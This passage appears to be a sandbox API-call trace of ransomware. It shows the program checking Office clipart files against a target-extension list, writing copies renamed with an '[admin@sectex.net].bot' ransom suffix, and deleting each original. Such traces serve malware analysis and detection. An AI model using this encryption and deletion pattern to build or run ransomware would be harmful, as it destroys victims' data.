	[0143.034] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.034] SetEndOfFile (hFile=0x388) returned 1
	[0143.035] CloseHandle (hObject=0x388) returned 1
	[0143.035] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.035] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.038] CloseHandle (hObject=0x3b4) returned 1
	[0143.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.038] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf")) returned 1
	[0143.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63
	[0143.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63
	[0143.039] lstrlenW (lpString=".doc") returned 4
	[0143.039] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.039] lstrlenW (lpString=".docx") returned 5
	[0143.039] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1
	[0143.039] lstrlenW (lpString=".pdf") returned 4
	[0143.039] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.039] lstrlenW (lpString=".xls") returned 4
	[0143.039] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.039] lstrlenW (lpString=".xlsx") returned 5
	[0143.039] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1
	[0143.039] lstrlenW (lpString=".ppt") returned 4
	[0143.039] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63
	[0143.039] lstrlenW (lpString=".zip") returned 4
	[0143.039] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.039] lstrlenW (lpString=".rar") returned 4
	[0143.039] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.039] lstrlenW (lpString=".bz2") returned 4
	[0143.039] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.039] lstrlenW (lpString=".7z") returned 3
	[0143.039] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63
	[0143.040] lstrlenW (lpString=".dbf") returned 4
	[0143.040] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63
	[0143.040] lstrlenW (lpString=".1cd") returned 4
	[0143.040] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63
	[0143.040] lstrlenW (lpString=".jpg") returned 4
	[0143.040] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63
	[0143.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63
	[0143.040] lstrlenW (lpString=".doc") returned 4
	[0143.040] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.040] lstrlenW (lpString=".docx") returned 5
	[0143.040] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1
	[0143.040] lstrlenW (lpString=".pdf") returned 4
	[0143.040] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.040] lstrlenW (lpString=".xls") returned 4
	[0143.040] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.040] lstrlenW (lpString=".xlsx") returned 5
	[0143.040] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1
	[0143.040] lstrlenW (lpString=".ppt") returned 4
	[0143.040] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63
	[0143.040] lstrlenW (lpString=".zip") returned 4
	[0143.040] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.040] lstrlenW (lpString=".rar") returned 4
	[0143.040] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.040] lstrlenW (lpString=".bz2") returned 4
	[0143.040] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.040] lstrlenW (lpString=".7z") returned 3
	[0143.040] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63
	[0143.041] lstrlenW (lpString=".dbf") returned 4
	[0143.041] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63
	[0143.041] lstrlenW (lpString=".1cd") returned 4
	[0143.041] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63
	[0143.041] lstrlenW (lpString=".jpg") returned 4
	[0143.041] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.041] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.041] lstrlenW (lpString="BS00174_.WMF") returned 12
	[0143.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.042] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=8366) returned 1
	[0143.042] CloseHandle (hObject=0x3b4) returned 1
	[0143.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf")) returned 0x20
	[0143.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.042] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.042] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.043] GetLastError () returned 0x0
	[0143.043] ReadFile (in: hFile=0x3b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x20ae, lpOverlapped=0x0) returned 1
	[0143.147] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x20b0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x20b0, lpOverlapped=0x0) returned 1
	[0143.148] ReadFile (in: hFile=0x3b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.148] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.148] SetEndOfFile (hFile=0x388) returned 1
	[0143.148] CloseHandle (hObject=0x388) returned 1
	[0143.148] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.149] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.151] CloseHandle (hObject=0x3b4) returned 1
	[0143.151] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.151] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf")) returned 1
	[0143.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63
	[0143.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63
	[0143.152] lstrlenW (lpString=".doc") returned 4
	[0143.152] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.152] lstrlenW (lpString=".docx") returned 5
	[0143.152] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.152] lstrlenW (lpString=".pdf") returned 4
	[0143.152] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.152] lstrlenW (lpString=".xls") returned 4
	[0143.152] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.152] lstrlenW (lpString=".xlsx") returned 5
	[0143.152] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.152] lstrlenW (lpString=".ppt") returned 4
	[0143.152] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63
	[0143.152] lstrlenW (lpString=".zip") returned 4
	[0143.152] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.152] lstrlenW (lpString=".rar") returned 4
	[0143.152] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.152] lstrlenW (lpString=".bz2") returned 4
	[0143.152] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.152] lstrlenW (lpString=".7z") returned 3
	[0143.152] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63
	[0143.152] lstrlenW (lpString=".dbf") returned 4
	[0143.152] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63
	[0143.152] lstrlenW (lpString=".1cd") returned 4
	[0143.152] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63
	[0143.152] lstrlenW (lpString=".jpg") returned 4
	[0143.152] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63
	[0143.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63
	[0143.153] lstrlenW (lpString=".doc") returned 4
	[0143.153] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.153] lstrlenW (lpString=".docx") returned 5
	[0143.153] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.153] lstrlenW (lpString=".pdf") returned 4
	[0143.153] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.153] lstrlenW (lpString=".xls") returned 4
	[0143.153] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.153] lstrlenW (lpString=".xlsx") returned 5
	[0143.153] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.153] lstrlenW (lpString=".ppt") returned 4
	[0143.153] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63
	[0143.153] lstrlenW (lpString=".zip") returned 4
	[0143.153] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.153] lstrlenW (lpString=".rar") returned 4
	[0143.153] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.153] lstrlenW (lpString=".bz2") returned 4
	[0143.153] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.153] lstrlenW (lpString=".7z") returned 3
	[0143.153] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63
	[0143.153] lstrlenW (lpString=".dbf") returned 4
	[0143.153] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63
	[0143.153] lstrlenW (lpString=".1cd") returned 4
	[0143.153] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63
	[0143.154] lstrlenW (lpString=".jpg") returned 4
	[0143.154] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.154] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.154] lstrlenW (lpString="BS00184_.WMF") returned 12
	[0143.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.154] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=4976) returned 1
	[0143.154] CloseHandle (hObject=0x3b4) returned 1
	[0143.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf")) returned 0x20
	[0143.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.155] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.155] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.157] GetLastError () returned 0x0
	[0143.157] ReadFile (in: hFile=0x3b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1370, lpOverlapped=0x0) returned 1
	[0143.158] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1380, lpOverlapped=0x0) returned 1
	[0143.159] ReadFile (in: hFile=0x3b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.159] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.159] SetEndOfFile (hFile=0x388) returned 1
	[0143.159] CloseHandle (hObject=0x388) returned 1
	[0143.159] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.159] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.165] CloseHandle (hObject=0x3b4) returned 1
	[0143.165] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.165] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf")) returned 1
	[0143.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63
	[0143.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63
	[0143.166] lstrlenW (lpString=".doc") returned 4
	[0143.166] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.166] lstrlenW (lpString=".docx") returned 5
	[0143.166] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.166] lstrlenW (lpString=".pdf") returned 4
	[0143.166] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.166] lstrlenW (lpString=".xls") returned 4
	[0143.166] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.166] lstrlenW (lpString=".xlsx") returned 5
	[0143.166] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.166] lstrlenW (lpString=".ppt") returned 4
	[0143.166] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63
	[0143.166] lstrlenW (lpString=".zip") returned 4
	[0143.166] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.166] lstrlenW (lpString=".rar") returned 4
	[0143.166] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.166] lstrlenW (lpString=".bz2") returned 4
	[0143.166] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.166] lstrlenW (lpString=".7z") returned 3
	[0143.166] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63
	[0143.167] lstrlenW (lpString=".dbf") returned 4
	[0143.167] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63
	[0143.167] lstrlenW (lpString=".1cd") returned 4
	[0143.167] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63
	[0143.167] lstrlenW (lpString=".jpg") returned 4
	[0143.167] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63
	[0143.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63
	[0143.167] lstrlenW (lpString=".doc") returned 4
	[0143.167] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.167] lstrlenW (lpString=".docx") returned 5
	[0143.167] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.167] lstrlenW (lpString=".pdf") returned 4
	[0143.167] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.167] lstrlenW (lpString=".xls") returned 4
	[0143.167] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.167] lstrlenW (lpString=".xlsx") returned 5
	[0143.167] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.167] lstrlenW (lpString=".ppt") returned 4
	[0143.167] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63
	[0143.167] lstrlenW (lpString=".zip") returned 4
	[0143.167] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.167] lstrlenW (lpString=".rar") returned 4
	[0143.167] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.167] lstrlenW (lpString=".bz2") returned 4
	[0143.167] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.167] lstrlenW (lpString=".7z") returned 3
	[0143.167] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63
	[0143.167] lstrlenW (lpString=".dbf") returned 4
	[0143.168] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63
	[0143.168] lstrlenW (lpString=".1cd") returned 4
	[0143.168] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63
	[0143.168] lstrlenW (lpString=".jpg") returned 4
	[0143.168] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.168] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.168] lstrlenW (lpString="BS00186_.WMF") returned 12
	[0143.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.169] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=12788) returned 1
	[0143.169] CloseHandle (hObject=0x3b4) returned 1
	[0143.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf")) returned 0x20
	[0143.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.170] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.170] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.170] GetLastError () returned 0x0
	[0143.170] ReadFile (in: hFile=0x3b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x31f4, lpOverlapped=0x0) returned 1
	[0143.172] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3200, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3200, lpOverlapped=0x0) returned 1
	[0143.173] ReadFile (in: hFile=0x3b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.173] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.173] SetEndOfFile (hFile=0x388) returned 1
